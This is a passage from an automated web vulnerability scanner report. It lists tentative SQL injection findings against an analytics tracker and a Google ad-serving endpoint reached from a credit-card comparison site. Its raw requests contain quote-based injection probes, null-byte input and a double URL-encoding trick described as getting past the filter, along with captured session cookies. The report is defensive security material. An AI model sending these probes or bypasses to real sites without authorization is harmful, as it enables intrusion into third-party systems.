U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=TYPE%3Abusiness&pidt=1&oid=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&ot=A&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311990921%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22034407%252526pg%25253D17%252526pgpos%25253D4%2526ot%253DA; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:15:45 GMT
Server: Omniture DC/2.0.0
Content-Length: 421
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/ccardsccdc-us/1 was not found on this server.</
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/ccardsccdc-us/1%00''/H.17/s91529709035530?AQB=1&ndh=1&t=17/5/2011%206%3A59%3A51%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&r=http%3A//www.creditcards.com/business.php&cc=USD&xact=1012011061706595020302843&purchaseID=1012011061706595020302843&events=purchase%2Cevent2&products=17%3B22034407%3B1%3B0&c9=6%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061706595020302843&v15=6%3A30AM&c16=4&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=17&v26=4&v28=lead%20confirmation&v29=17%3A22034407%7C4&v30=17%3A22034407&v31=22034407%7C4&v32=17%7C4&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=TYPE%3Abusiness&pidt=1&oid=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&ot=A&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311990921%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22034407%252526pg%25253D17%252526pgpos%25253D4%2526ot%253DA; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:15:45 GMT
Server: Omniture DC/2.0.0
xserver: www284
Content-Length: 0
Content-Type: text/html

1.6. http://googleads.g.doubleclick.net/pagead/ads [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24%2527
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:27:06 GMT
Server: cafe
Cache-Control: private
Content-Length: 8452
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">

<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}

else if (window.ActiveXObject && window.execScript){

window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24%2527%2527
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.7. http://googleads.g.doubleclick.net/pagead/ads [biw parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The biw parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the biw parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the biw request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049%2527&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:21:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 8528
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">

<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}

else if (window.ActiveXObject && window.execScript){

window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049%2527%2527&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.8. http://googleads.g.doubleclick.net/pagead/ads [dtd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The dtd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dtd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the dtd request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397%2527&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:24:51 GMT
Server: cafe
Cache-Control: private
Content-Length: 8064
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">
<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397%2527%2527&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.9. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The ifi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ifi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1'&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:24:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 8072
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">
<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1''&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.10. http://googleads.g.doubleclick.net/pagead/ads [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com&1'=1 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:26:56 GMT
Server: cafe
Cache-Control: private
Content-Length: 8465
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">

<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}

else if (window.ActiveXObject && window.execScript){

window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com&1''=1 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
